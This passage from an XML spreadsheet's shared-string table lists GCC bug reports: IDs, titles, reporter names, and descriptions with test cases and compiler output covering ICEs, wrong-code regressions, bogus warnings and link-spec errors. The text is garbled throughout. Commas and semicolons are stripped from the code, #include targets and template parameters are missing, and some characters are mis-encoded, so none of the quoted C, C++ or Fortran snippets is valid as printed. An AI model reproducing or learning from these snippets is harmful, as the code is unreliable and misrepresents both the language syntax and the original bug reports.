    <t>ctype::do_is(mask wchar_t) doesn't handle multiple bits in mask.</t>
  </si>
  <si>
    <t>ctype::do_is(mask m wchar_t c) assumes that m is equal to one
of the values in the ctype_base::mask enumeration. This causes do_is to
fail when more than one bit is set in m.</t>
  </si>
  <si>
    <t>peturrun</t>
  </si>
  <si>
    <t>GCC-10187</t>
  </si>
  <si>
    <t>string literal converted to non-const `char[]' when used as argument to function template</t>
  </si>
  <si>
    <t>The following code:
template
int foo(const T
template
int foo(const char* const&amp; x)
{
}
template
int foo(char* const&amp; x)
{
}
int main()
{
  foo(bar)
  return 0
}
Gives the following output:
&gt; g++ test.cc
/tmp/cc8rMEFw.o(.text+0x25): In function `main':
: undefined reference to `int foo(char[4] const&amp;)'
collect2: ld returned 1 exit status
This means that although the string constant should be of type const char* and should resolve to call the first specialization of foo it in fact doesn't do this at all it resolves to foo which means that the literal is seen as being of a non-constant type as well! In addition it is not possible to specialize foo for T=char[] or T=char[4] because of the presence of the reference in the original definition of foo.
Release:
3.2.3
Environment:
Debian unstable build of 10 feb 2003</t>
  </si>
  <si>
    <t>bsamwel</t>
  </si>
  <si>
    <t>GCC-27784</t>
  </si>
  <si>
    <t>Comparison of strings with char(0)</t>
  </si>
  <si>
    <t>$ cat string_null_compare_1.f
      program main
      character*3 str1 str2
      call setval(str1 str2)
      if (str1 == str2) print *'Should be unqual'
      end
      subroutine setval(str1 str2)
      character*3 str1 str2
      str1 = 'a' // CHAR(0) // 'a'
      str2 = 'a' // CHAR(0) // 'c'
      end
$ gfortran string_null_compare_1.f
$ ./a.out
 Should be unqual
$ g77 string_null_compare_1.f
$ ./a.out
$</t>
  </si>
  <si>
    <t>GCC-56147</t>
  </si>
  <si>
    <t>[4.8 Regression] ICE on invalid code in lto_symtab_merge_decls_1</t>
  </si>
  <si>
    <t>$ cat &gt; foo.c
extern void baz(void)
void foo(void)
{
  baz()
}
^D
$ cat &gt; bar.c
extern int baz
void bar(void)
{
  ++baz
}
^D
$ gcc -flto foo.c bar.c
lto1: internal compiler error: tree check: expected function_decl have var_decl in lto_symtab_merge_decls_1 at lto-symtab.c:446
0x872a772 tree_check_failed(tree_node const* char const* int char const* ...)
        ../../gcc-4.8/gcc/tree.c:8946
0x83ec6f2 tree_check
        ../../gcc-4.8/gcc/tree.h:3669
0x83ec6f2 lto_symtab_merge_decls_1
        ../../gcc-4.8/gcc/lto-symtab.c:446
0x83ec947 lto_symtab_merge_decls()
        ../../gcc-4.8/gcc/lto-symtab.c:522
0x811af10 read_cgraph_and_symbols
        ../../gcc-4.8/gcc/lto/lto.c:3037
0x811b228 lto_main()
        ../../gcc-4.8/gcc/lto/lto.c:3370
[...]
	GCC 4.7 gives:
In file included from :0:0:
foo.c:1:13: error: variable 'baz' redeclared as function
In file included from foo.c:1:0
                 from :0:
bar.c:1:12: note: previously declared here
lto1: fatal error: errors during merging of translation units
compilation terminated.
[...]
	GCC 4.6 is even more concise:
foo.c:1:13: error: variable 'baz' redeclared as function
bar.c:1:12: note: previously declared here
lto1: fatal error: errors during merging of translation units
compilation terminated.
[...]</t>
  </si>
  <si>
    <t>GCC-79017</t>
  </si>
  <si>
    <t>Old PowerMac G5 MacPorts GCC 5.4 C++11 and std::log2 has not been declared</t>
  </si>
  <si>
    <t>I'm working on a PowerMac G5. It runs OS X 10.5.8. It has MacPorts installed for updated gear.
The program:
$ cat test.cxx
#include 
int main(int argc char* argv[])
{
    double d = std::log2(2.3456789f)
    return 0
}
Results:
$ /opt/local/bin/g++-mp-5 -std=c++11 test.cxx -o test.exe
test.cxx: In function 'int main(int char**)':
test.cxx:4:16: error: 'log2' is not a member of 'std'
     double d = std::log2(2.3456789f)
                ^
test.cxx:4:16: note: suggested alternative:
In file included from /usr/include/math.h:26:0
                 from /opt/local/include/gcc5/c++/cmath:44
                 from test.cxx:1:
/usr/include/architecture/ppc/math.h:431:15: note:   'log2'
 extern double log2( double )
               ^
Compiler:
$ /opt/local/bin/g++-mp-5 --version
g++-mp-5 (MacPorts gcc5 5.4.0_0) 5.4.0
Copyright (C) 2015 Free Software Foundation Inc.
...
***************
From JW offlist:
#include 
int main() {
          typedef double_t  my_double_t
          typedef float_t   my_float_t
          acosh(0.0)
          acoshf(0.0f)
          acoshl(0.0l)
          asinh(0.0)
          asinhf(0.0f)
          asinhl(0.0l)
          atanh(0.0)
          atanhf(0.0f)
          atanhl(0.0l)
          cbrt(0.0)
          cbrtf(0.0f)
          cbrtl(0.0l)
          copysign(0.0 0.0)
          copysignf(0.0f 0.0f)
          copysignl(0.0l 0.0l)
          erf(0.0)
          erff(0.0f)
          erfl(0.0l)
          erfc(0.0)
          erfcf(0.0f)
          erfcl(0.0l)
          exp2(0.0)
          exp2f(0.0f)
          exp2l(0.0l)
          expm1(0.0)
          expm1f(0.0f)
          expm1l(0.0l)
          fdim(0.0 0.0)
          fdimf(0.0f 0.0f)
          fdiml(0.0l 0.0l)
          fma(0.0 0.0 0.0)
          fmaf(0.0f 0.0f 0.0f)
          fmal(0.0l 0.0l 0.0l)
          fmax(0.0 0.0)
          fmaxf(0.0f 0.0f)
          fmaxl(0.0l 0.0l)
          fmin(0.0 0.0)
          fminf(0.0f 0.0f)
          fminl(0.0l 0.0l)
          hypot(0.0 0.0)
          hypotf(0.0f 0.0f)
          hypotl(0.0l 0.0l)
          ilogb(0.0)
          ilogbf(0.0f)
          ilogbl(0.0l)
          lgamma(0.0)
          lgammaf(0.0f)
          lgammal(0.0l)
          llrint(0.0)
          llrintf(0.0f)
          llrintl(0.0l)
          llround(0.0)
          llroundf(0.0f)
          llroundl(0.0l)
          log1p(0.0)
          log1pf(0.0f)
          log1pl(0.0l)
          log2(0.0)
          log2f(0.0f)
          log2l(0.0l)
          logb(0.0)
          logbf(0.0f)
          logbl(0.0l)
          lrint(0.0)
          lrintf(0.0f)
          lrintl(0.0l)
          lround(0.0)
          lroundf(0.0f)
          lroundl(0.0l)
          nan(0)
          nanf(0)
          nanl(0)
          nearbyint(0.0)
          nearbyintf(0.0f)
          nearbyintl(0.0l)
          nextafter(0.0 0.0)
          nextafterf(0.0f 0.0f)
          nextafterl(0.0l 0.0l)
          nexttoward(0.0 0.0)
          nexttowardf(0.0f 0.0f)
          nexttowardl(0.0l 0.0l)
          remainder(0.0 0.0)
          remainderf(0.0f 0.0f)
          remainderl(0.0l 0.0l)
          remquo(0.0 0.0 0)
          remquof(0.0f 0.0f 0)
          remquol(0.0l 0.0l 0)
          rint(0.0)
          rintf(0.0f)
          rintl(0.0l)
          round(0.0)
          roundf(0.0f)
          roundl(0.0l)
          scalbln(0.0 0l)
          scalblnf(0.0f 0l)
          scalblnl(0.0l 0l)
          scalbn(0.0 0)
          scalbnf(0.0f 0)
          scalbnl(0.0l 0)
          tgamma(0.0)
          tgammaf(0.0f)
          tgammal(0.0l)
          trunc(0.0)
          truncf(0.0f)
          truncl(0.0l)
          return 0
}
Results in:
$ /opt/local/bin/g++-mp-5 -std=c++11 test.cxx -o test.exe
test.cxx: In function 'int main()':
test.cxx:53:21: error: 'llrint' was not declared in this scope
           llrint(0.0)
                     ^
test.cxx:54:23: error: 'llrintf' was not declared in this scope
           llrintf(0.0f)
                       ^
test.cxx:55:23: error: 'llrintl' was not declared in this scope
           llrintl(0.0l)
                       ^
test.cxx:56:22: error: 'llround' was not declared in this scope
           llround(0.0)
                      ^
test.cxx:57:24: error: 'llroundf' was not declared in this scope
           llroundf(0.0f)
                        ^
test.cxx:58:24: error: 'llroundl' was not declared in this scope
           llroundl(0.0l)
                        ^</t>
  </si>
  <si>
    <t>GCC-5189</t>
  </si>
  <si>
    <t>g++ -c bug.cpp crashed on simple stupid file</t>
  </si>
  <si>
    <t>A few templates using each other cause g++ to do a segmentation fault. I guess my code itself has a flaw just the way the compiler tells this is not very helpful.
I am attaching the source file. It's 13 lines and no include file.
Release:
3.0.3
Environment:
Linux 2.2.17 #3
How-To-Repeat:
g++ -c bug.cpp</t>
  </si>
  <si>
    <t>hkluender</t>
  </si>
  <si>
    <t>GCC-63477</t>
  </si>
  <si>
    <t>[6/7/8 Regression] Bogus warning with -O3 -Warray-bounds: array subscript is above array bounds</t>
  </si>
  <si>
    <t>When compiled with -O3 the following code produces an array subscript is above array bounds warning which is bogus as far as I can tell:
#define MAX_VAL 16
typedef struct 
{
	int itemList[MAX_VAL+1]
	unsigned int numItems
} ItemList
void FrobList(ItemList *l)
{
	unsigned int i
	for (i=0 i numItems-1 i++) {
		int minVal = l-&gt;itemList[i]
		unsigned int minIdx = i
		unsigned int idx
		for (idx=i+1 idx numItems ++idx) {
			if (l-&gt;itemList[idx] &lt; minVal) {
				minVal = l-&gt;itemList[idx]
				minIdx = idx
			}
		}
		l-&gt;itemList[i] = l-&gt;itemList[minIdx]
	}
}
$ gcc -O3 -Warray-bounds -c LmiH264RefPictures-Reduced.c
LmiH264RefPictures-Reduced.c: In function â€˜FrobListâ€™:
LmiH264RefPictures-Reduced.c:18:19: warning: array subscript is above array bounds [-Warray-bounds]
    if (l-&gt;itemList[idx] &lt; minVal) {
                   ^
The warning occurs on compilers targeted to x86_64 and armhf but not i686.  It does not occur with -O2 or lower.  Tested on both Linux and Cygwin.
This is a regression from GCC 4.6.3 at least. Have not tested 4.7.x.
Clearly it would be an out-of-bounds access if l-&gt;numItems were &gt;= MAX_VAL+1 but (in the actual application this testcase is reduced from) it's an invariant that it won't be and the compiler shouldn't be making range assumptions to the contrary.
Verbose compiler output:
$ gcc -v -O3 -Warray-bounds -c LmiH264RefPictures-Reduced.c
Using built-in specs.
COLLECT_GCC=gcc
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu 4.8.2-19ubuntu1' --with-bugurl=file:///usr/share/doc/gcc-4.8/README.Bugs --enable-languages=cc++javagod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disable-libmudflap --enable-plugin --with-system-zlib --disable-browser-plugin --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-4.8-amd64/jre --enable-java-home --with-jvm-root-dir=/usr/lib/jvm/java-1.5.0-gcj-4.8-amd64 --with-jvm-jar-dir=/usr/lib/jvm-exports/java-1.5.0-gcj-4.8-amd64 --with-arch-directory=amd64 --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --enable-objc-gc --enable-multiarch --disable-werror --with-arch-32=i686 --with-abi=m64 --with-multilib-list=m32m64mx32 --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) 
COLLECT_GCC_OPTIONS='-v' '-O3' '-Warray-bounds' '-c' '-mtune=generic' '-march=x86-64'
 /usr/lib/gcc/x86_64-linux-gnu/4.8/cc1 -quiet -v -imultiarch x86_64-linux-gnu LmiH264RefPictures-Reduced.c -quiet -dumpbase LmiH264RefPictures-Reduced.c -mtune=generic -march=x86-64 -auxbase LmiH264RefPictures-Reduced -O3 -Warray-bounds -version -fstack-protector -Wformat -Wformat-security -o /tmp/ccXMNHkF.s
GNU C (Ubuntu 4.8.2-19ubuntu1) version 4.8.2 (x86_64-linux-gnu)
	compiled by GNU C version 4.8.2 GMP version 5.1.3 MPFR version 3.1.2-p3 MPC version 1.0.1
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
ignoring nonexistent directory /usr/local/include/x86_64-linux-gnu
ignoring nonexistent directory /usr/lib/gcc/x86_64-linux-gnu/4.8/../../../../x86_64-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/lib/gcc/x86_64-linux-gnu/4.8/include
 /usr/local/include
 /usr/lib/gcc/x86_64-linux-gnu/4.8/include-fixed
 /usr/include/x86_64-linux-gnu
 /usr/include
End of search list.
GNU C (Ubuntu 4.8.2-19ubuntu1) version 4.8.2 (x86_64-linux-gnu)
	compiled by GNU C version 4.8.2 GMP version 5.1.3 MPFR version 3.1.2-p3 MPC version 1.0.1
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: dc75e0628c9356affcec059d0c81cc01
LmiH264RefPictures-Reduced.c: In function â€˜FrobListâ€™:
LmiH264RefPictures-Reduced.c:18:19: warning: array subscript is above array bounds [-Warray-bounds]
    if (l-&gt;itemList[idx] &lt; minVal) {
                   ^
COLLECT_GCC_OPTIONS='-v' '-O3' '-Warray-bounds' '-c' '-mtune=generic' '-march=x86-64'
 as -v --64 -o LmiH264RefPictures-Reduced.o /tmp/ccXMNHkF.s
GNU assembler version 2.24 (x86_64-linux-gnu) using BFD version (GNU Binutils for Ubuntu) 2.24
COMPILER_PATH=/usr/lib/gcc/x86_64-linux-gnu/4.8/:/usr/lib/gcc/x86_64-linux-gnu/4.8/:/usr/lib/gcc/x86_64-linux-gnu/:/usr/lib/gcc/x86_64-linux-gnu/4.8/:/usr/lib/gcc/x86_64-linux-gnu/
LIBRARY_PATH=/usr/lib/gcc/x86_64-linux-gnu/4.8/:/usr/lib/gcc/x86_64-linux-gnu/4.8/../../../x86_64-linux-gnu/:/usr/lib/gcc/x86_64-linux-gnu/4.8/../../../../lib/:/lib/x86_64-linux-gnu/:/lib/../lib/:/usr/lib/x86_64-linux-gnu/:/usr/lib/../lib/:/usr/lib/gcc/x86_64-linux-gnu/4.8/../../../:/lib/:/usr/lib/
COLLECT_GCC_OPTIONS='-v' '-O3' '-Warray-bounds' '-c' '-mtune=generic' '-march=x86-64'</t>
  </si>
  <si>
    <t>GCC-13258</t>
  </si>
  <si>
    <t>strings used for the extern keyword are being translated by the -fexec-charset option</t>
  </si>
  <si>
    <t>Below are compiler setup and compile error messages it appears that the C
and/or the C++ in extern statements are being translated with the new
-fexec-charset compiler option and the compiler is expecting 'good old ASCII'
characters when it lexes those statements.
Configured with: /opt/compiler_source/34base/configure --target=s390x-ibm-tpf
--prefix=/opt/tpf-cross-tools --program-prefix=s390x-ibm-tpf-
--enable-languages=cc++ --with-dwarf2 --disable-threads
--with-binutils=/opt/tpf-cross-tools/bin
--with-libs=/opt/tpf-cross-tools/s390x-ibm-tpf/lib
Thread model: single
gcc version 3.4 20031121 (experimental)
Compile command and error message:
[~/bug]s390x-ibm-tpf-g++ -fexec-charset=IBM1047 -c bugrept.cc -Wall -save-temps
bugrept.cc:1: error: language string `ÃƒNN' not recognized
Note:
Ãƒ is the ISO-8859-1 representation of character point /xC3 which is the
letter C in IBM1047 and
ÃƒNN is the ISO-8859-1 representation of character points /xC3/x4E/x4E which
is the string C++ in IBM1047)
Below is the original .cc file source.  (No includes and about 5 lines so I
considered the .ii file not worth shipping.)
==============begin bugrept.cc source========
extern C++ {  //alternately use extern C {
 int testbug (void) {
   return 0
 }
} //extern block
==============end bugrept.cc source========</t>
  </si>
  <si>
    <t>darcypj</t>
  </si>
  <si>
    <t>GCC-35996</t>
  </si>
  <si>
    <t>ICE while building simple ObjC code with -fobjc-gc</t>
  </si>
  <si>
    <t>this simple test code provided by Michael Arntzenius causes gcc to ICE when built with -fobjc-gc.  happens with gcc 4.1/4.2/4.3 on x86_64.  x86 seems to pass OK.
$ cat test.m
#import 
@interface Test: Object { int i }
@end
Test *global_var
@implementation Test
+initialize {
    global_var = [Test new]
}
@end
$ gcc-4.3.0 -fobjc-gc test.m
test.m: In function â€˜+[Test initialize]â€™:
test.m:7: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-51435</t>
  </si>
  <si>
    <t>[4.6/4.7 Regression] Bad association status after null() of derived type component</t>
  </si>
  <si>
    <t>Created attachment 26002
test code
Here is the code:
!---------------
module arr_m
    type arr_t
        real(8) dimension(:) allocatable :: rsk
        ! if allocatable changed to pointer all is OK
    end type
end module arr_m
!*********************
module list_m
    use arr_m
    implicit none
    type my_list
        type(arr_t) pointer :: head =&gt; null()
        !!!integer pointer     :: tail =&gt; null() !if this is uncommented all is OK.
    end type my_list
end module list_m
!***********************
module worker_mod
    use list_m
    implicit none
    type data_all_t
        type(my_list) :: my_data
    end type data_all_t
contains
    subroutine do_job()
        type(data_all_t) :: dum
        if (associated(dum%my_data%head)) then
            print * 'do_job my_data%head is associated' 
!
! gfortran goes here.
! WRONG. head was nullified.
!
        else
            print * 'do_job my_data%head is NOT associated' ! OK
        end if
    end subroutine
end module
!***************
program hello
    use worker_mod
    implicit none
    call do_job()
end program
!***************
gfortran reports that dum%my_data%head is associated in the sub do_job while head component was nullified using null() in the variable declaration line.
I tested this with gfortran 4.6 and 4.7 on Linux and Windows (produces wrong results). Version 4.5 outputs correct result. (ifort is OK).</t>
  </si>
  <si>
    <t>darmar.xxl</t>
  </si>
  <si>
    <t>GCC-69166</t>
  </si>
  <si>
    <t>[5 Regression] ICE in get_initial_def_for_reduction at tree-vect-loop.c:4188</t>
  </si>
  <si>
    <t>trunk r232077 powerpc64le-linux-gnu works with -O2
reduced test case:
double a
int b c d
void fn1()
void fn2() {
  double *e
  b = 0
  for ( b &lt; d b++) {
    c = 0
    for ( c &lt; d c++)
      e[b] /= a
  }
  fn1()
}
$ gcc -c -g -O3 fft.i 
fft.i: In function 'fn2':
fft.i:4:6: internal compiler error: in get_initial_def_for_reduction at tree-vect-loop.c:4188
 void fn2() {
      ^~~
0x108e4b83 get_initial_def_for_reduction(gimple* tree_node* tree_node**)
        ../../src/gcc/tree-vect-loop.c:4188
0x1015e5ff vect_create_epilog_for_reduction
        ../../src/gcc/tree-vect-loop.c:4347
0x108e6517 vectorizable_reduction(gimple* gimple_stmt_iterator* gimple** _slp_tree*)
        ../../src/gcc/tree-vect-loop.c:6175
0x108dd16b vect_transform_stmt(gimple* gimple_stmt_iterator* bool* _slp_tree* _slp_instance*)
        ../../src/gcc/tree-vect-stmts.c:8232
0x108e1e7f vect_transform_loop(_loop_vec_info*)
        ../../src/gcc/tree-vect-loop.c:6868
0x109005d3 vectorize_loops()
        ../../src/gcc/tree-vectorizer.c:554
0x108167eb execute
        ../../src/gcc/tree-ssa-loop.c:420
Please submit a full bug report
with preprocessed source if appropriate.</t>
  </si>
  <si>
    <t>GCC-53399</t>
  </si>
  <si>
    <t>*ffs pattern generates wrong code with BMI enabled</t>
  </si>
  <si>
    <t>We have in GCC int. (__ffs description):
These functions return the index of the least significant 1-bit in a or the value zero if a is zero.
and in i386.md:
(define_insn *ffs_1
  [(set (reg:CCZ FLAGS_REG)
        (compare:CCZ (match_operand:SWI48 1 nonimmediate_operand rm)
                     (const_int 0)))
   (set (match_operand:SWI48 0 register_operand =r)
        (ctz:SWI48 (match_dup 1)))]
{
  if (TARGET_BMI)
    return tzcnt{}\t{%1 %0|%0 %1}
  else 
This pattern works fine for bsf insn (although the result with zero input is undefined)
But for tzcnt with 0 as input we have (operand_size+1) as output.
That contradicts with GCC int right?
It also seems to fail gcc.c-torture/execute/builtin-bitops-1.c</t>
  </si>
  <si>
    <t>kirill.yukhin</t>
  </si>
  <si>
    <t>GCC-15585</t>
  </si>
  <si>
    <t>g77 ICE in force_nonfallthru_and_redirect</t>
  </si>
  <si>
    <t>The attached file elxxdl.f (actually I'll attach it as soon as I find out how to attach a file here) produces 
the following output
 g77 -v -O3 -c elxxdl.f
Reading specs from /sw_current/bin/../lib/gcc/powerpc-apple-darwin7.3.0/3.4.0/specs
Configured with: ../gcc-3.4.0/configure --prefix=/sw --enable-languages=f77 --infodir=/share/info 
--libexecdir=/lib --disable-shared
Thread model: posix
gcc version 3.4.0
 /sw_current/bin/../lib/gcc/powerpc-apple-darwin7.3.0/3.4.0/f771 elxxdl.f -fPIC -quiet -dumpbase 
elxxdl.f -auxbase elxxdl -O3 -version -o /var/tmp//ccTnLrxk.s
GNU F77 version 3.4.0 (powerpc-apple-darwin7.3.0)
        compiled by GNU C version 3.4.0.
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
In file included from elxxdl.f:0:
elxxdl.f:1: internal compiler error: in force_nonfallthru_and_redirect at cfgrtl.c:1114
Please submit a full bug report
It compiles OK with -O2 and with -Os. It produces the same ICE when compiled with
g77 -O -finline-functions -funswitch-loops
or with any -Ox option plus -finline-functions -funswitch-loops (I found these in old reports on 
problems with force_nonfallthru_and_redirect)
When compiled with g77 from
gcc version 3.4 20031015 (experimental)
it compiles OK with -O3 but produces the ICE with
g77 -O -finline-functions -funswitch-loops</t>
  </si>
  <si>
    <t>costabel</t>
  </si>
  <si>
    <t>GCC-65711</t>
  </si>
  <si>
    <t>arm*-linux* link spec passes '-dynamic-linker' even for '-shared'</t>
  </si>
  <si>
    <t>gcc/config/arm/linux-elf.h defines LINUX_TARGET_LINK_SPEC to (simplified):
  %{!static -dynamic-linker LINKER}
However '-dynamic-linker' should not be passed when '-shared' is used.  The correct way appears to be what config/i386/gnu-user.h does which is:
  %{!static %{!shared -dynamic-linker LINKER}}
I believe the attached patch fixes that.  At least both 4.8.4 and 4.9.2 are affected.
(Initially discussed in the context of .)</t>
  </si>
  <si>
    <t>GCC-65721</t>
  </si>
  <si>
    <t>[4.8/4.9/5/6 Regression] Internal compiler error segmentation fault</t>
  </si>
  <si>
    <t>Following code produces a segmentation fault with gcc 4.8.2.
gcc 4.7.2 and 4.6.3 reject the code (which is probably invalid c++) without segmentation code.
tkeck@ekplx12:~$ cat test.cpp 
template
class A {
        public:
                typedef T D
}
template
class B : public A {
        using typename B::D // Triggers segfault and probably invalid C++
        //using typename A::D // Works fine and probably valid C++
        public:
                D echo(D x) {
                        return x
                }
}
int main() {
        B b
}
tkeck@ekplx12:~$ g++ test.cpp 
g++: internal compiler error: Segmentation fault (program cc1plus)
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
tkeck@ekplx12:~$ g++ -v
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/4.8/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu 4.8.2-19ubuntu1' --with-bugurl=file:///usr/share/doc/gcc-4.8/README.Bugs --enable-languages=cc++javagodfortranobjcobj-c++ --prefix=/usr --program-suffix=-4.8 --enable-shared --enable-linker-build-id --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.8 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --disable-libmudflap --enable-plugin --with-system-zlib --disable-browser-plugin --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-4.8-amd64/jre --enable-java-home --with-jvm-root-dir=/usr/lib/jvm/java-1.5.0-gcj-4.8-amd64 --with-jvm-jar-dir=/usr/lib/jvm-exports/java-1.5.0-gcj-4.8-amd64 --with-arch-directory=amd64 --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --enable-objc-gc --enable-multiarch --disable-werror --with-arch-32=i686 --with-abi=m64 --with-multilib-list=m32m64mx32 --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1)</t>
  </si>
  <si>
    <t>t.keck</t>
  </si>
  <si>
    <t>GCC-48915</t>
  </si>
  <si>
    <t>Incorrect process return code with -fdump-core</t>
  </si>
  <si>
    <t>Consider the program
program errcode
  stop 10
end program errcode
$ gfortran errcode.f90
$ ./a.out 
STOP 10
$ echo $?
10
$ gfortran -fdump-core errcode.f90 
$ ./a.out 
STOP 10
Quit (core dumped)
$ echo $?
131
Looking at runtime/error.c (sys_exit) the reason is quite obvious with 
kill(getpid() SIGQUIT)
the process kills itself (return code is 128 + signal number = 131 in this case) and never gets a chance to execute exit() with the provided exit code!</t>
  </si>
  <si>
    <t>jb</t>
  </si>
  <si>
    <t>GCC-23960</t>
  </si>
  <si>
    <t>[4.1 regression] ICE in compare_values in VRP</t>
  </si>
  <si>
    <t>typedef long unsigned int size_t 
size_t __attribute__((noinline)) 
choose_block (char *d size_t dlen int col 
              size_t *wlen) 
{ 
  size_t n nn 
  n = dlen 
  for () 
  { 
    ((void) ((d + n &gt; d) ? 0 : (__assert_fail (d + n &gt; d rfc2047.c 346 
__PRETTY_FUNCTION__) 0))) 
    if (!nn &amp;&amp; (col + *wlen &lt;= 75 + 1 || n &lt;= 1)) 
      break 
  } 
  return n 
} 
--&gt; compile with -O2 
t.c: In function ?choose_block?: 
t.c:6: internal compiler error: in compare_values at tree-vrp.c:415 
Breakpoint 1 fancy_abort (file=0xbd5846 ../../mainline/gcc/tree-vrp.c 
line=415 
    function=0xbd58b6 compare_values) at diagnostic.c:590 
590       internal_error (in %s at %s:%d function trim_filename (file) 
line) 
(gdb) up 
#1  0x000000000094c645 in compare_values (val1=0x2a95a5a000 
val2=0x2a95a4fe70) at tree-vrp.c:414 
414       gcc_assert (POINTER_TYPE_P (TREE_TYPE (val1)) 
(gdb) l 
409       if (val1 == val2) 
410         return 0 
411 
412       /* Below we rely on the fact that VAL1 and VAL2 are both pointers or 
413          both integers.  */ 
414       gcc_assert (POINTER_TYPE_P (TREE_TYPE (val1)) 
415                   == POINTER_TYPE_P (TREE_TYPE (val2))) 
416 
417       /* Do some limited symbolic comparisons.  */ 
418       if (!POINTER_TYPE_P (TREE_TYPE (val1))) 
(gdb) p debug_tree_cfg (0) 
choose_block (d dlen col wlen) 
{ 
  static const char __PRETTY_FUNCTION__[13] = choose_block 
  size_t nn 
  size_t n 
  size_t D.1627 
  _Bool D.1626 
  _Bool D.1625 
  _Bool D.1624 
  size_t D.1623 
  size_t D.1622 
  size_t D.1621 
  int iftmp.0 
  # BLOCK 0 
  # PRED: ENTRY (fallthruexec) 
  n_2 = dlen_1 
  goto  () 
  # SUCC: 7 (fallthruexec) 
  # BLOCK 1 
  # PRED: 3 (falseexec) 4 (falseexec) 
: 
  # SUCC: 7 [100.0%]  (fallthruexec) 
  # BLOCK 7 
  # PRED: 1 [100.0%]  (fallthruexec) 0 (fallthruexec) 
: 
  if (dlen_1 == 0B) goto  else goto  
  # SUCC: 2 (trueexec) 6 (falseexec) 
  # BLOCK 6 
  # PRED: 7 (falseexec) 
: 
  dlen_14 = ASSERT_EXPR  
  goto  () 
  # SUCC: 3 [100.0%]  (fallthruexec) 
  # BLOCK 2 
  # PRED: 7 (trueexec) 
: 
  __assert_fail ( 
  # SUCC: 3 (fallthruexec) 
  # BLOCK 3 
  # PRED: 2 (fallthruexec) 6 [100.0%]  (fallthruexec) 
: 
  if (nn_3 == 0) goto  else goto  
  # SUCC: 4 (trueexec) 1 (falseexec) 
  # BLOCK 4 
  # PRED: 3 (trueexec) 
: 
  D.1621_5 = (size_t) col_4 
  D.1622_7 = *wlen_6 
  D.1623_8 = D.1621_5 + D.1622_7 
  D.1624_9 = D.1623_8 &lt;= 76 
  D.1625_10 = dlen_1 &lt;= 1 
  D.1626_11 = D.1624_9 || D.1625_10 
  if (D.1626_11) goto  else goto  
  # SUCC: 5 (trueexec) 1 (falseexec) 
  # BLOCK 5 
  # PRED: 4 (trueexec) 
: 
  n_12 = dlen_1 
  return dlen_1 
  # SUCC: EXIT 
} 
$1 = void 
(gdb) p debug_generic_expr (val1) 
dlenD.1609_1 
$2 = void 
(gdb) p debug_generic_expr (val2) 
0B 
(gdb) 
This bug shows up when building mutt.</t>
  </si>
  <si>
    <t>GCC-28307</t>
  </si>
  <si>
    <t>[4.1/4.2/4.3 Regression] pthread functions in libgcc not weak any more on Tru64 UNIX</t>
  </si>
  <si>
    <t xml:space="preserve">
While investigating the root cause of PR libgcj/28189 I noticed that both
on the 4.1 branch and on mainline (where the libjava testsuite timeouts
occur) the boehm-gc test had started failing as well (which easily goes
unnoticed due to PR boehm-gc/11412): gctest fails like this:
Key creation failed 18446744073709551615
Test failed
FAIL: gctest
It turns out that this happens when pthread_key_create returns -1.
Printing errno at this point reveals that errno is 0 which is unexpected
and shouldn't happen with the function from libpthread.
Upon further investigation it turned out that the pthread function
definitions from gthr-posix.c aren't marked weak any more so the dummy
function definitions make it into libgcc.a and libgcc_s.so.1 which of
course every usage of the real pthread functions.  This was introduce by
this patch and it's successors:
2005-11-09  Alexandre Oliva  
	PR other/4372
	* gthr-dce.h gthr-posix.h gthr-posix95.h gthr-solaris.h
	gthr-tpf.h: Define __gthrw.  For all identifiers that might
	be weak introduce weakrefs or non-weak aliases with __gthrw
	and prefix all uses with __ghtrw.
Before that change there were #pragma weak declarations for all functions
defined in gthr-posix.c so those definitions became weak.  Afterwards
those declarations were lost and the definitions became strong.
Environment:
System: OSF1 bartok V5.1 2650 alpha
Machine: alpha
host: alpha-dec-osf5.1b
build: alpha-dec-osf5.1b
target: alpha-dec-osf5.1b
configured with: /vol/gcc/src/gcc/configure --prefix=/vol/gcc --with-local-prefix=/vol/gcc --disable-nls --host alpha-dec-osf5.1b --build alpha-dec-osf5.1b --target alpha-dec-osf5.1b --with-gmp-dir=/vol/gnu/obj/gmp-4.1.3 --with-mpfr-dir=/vol/gnu/obj/gmp-4.1.3/mpfr --enable-languages=cc++fortranjavaobjcada --disable-libmudflap
How-To-Repeat:
Investigate e.g. the pthread_key_create definition in libgcc.a and
libgcc_s.so.1 with stdump:
On the 4.0 branch it is marked weak:
6. (file  0) (0x10) pthread_key_create Proc       Text       symref (indexNil)  (weakext)
while on mainline and the 4.1 branch this is lost:
6. (file  0) (0x10) pthread_key_create Proc       Text       symref (indexNil)</t>
  </si>
  <si>
    <t>GCC-46758</t>
  </si>
  <si>
    <t>[4.5/4.6 Regression] -fgraphite-identity produces wrong code when using 64bit constants</t>
  </si>
  <si>
    <t>Created attachment 22597
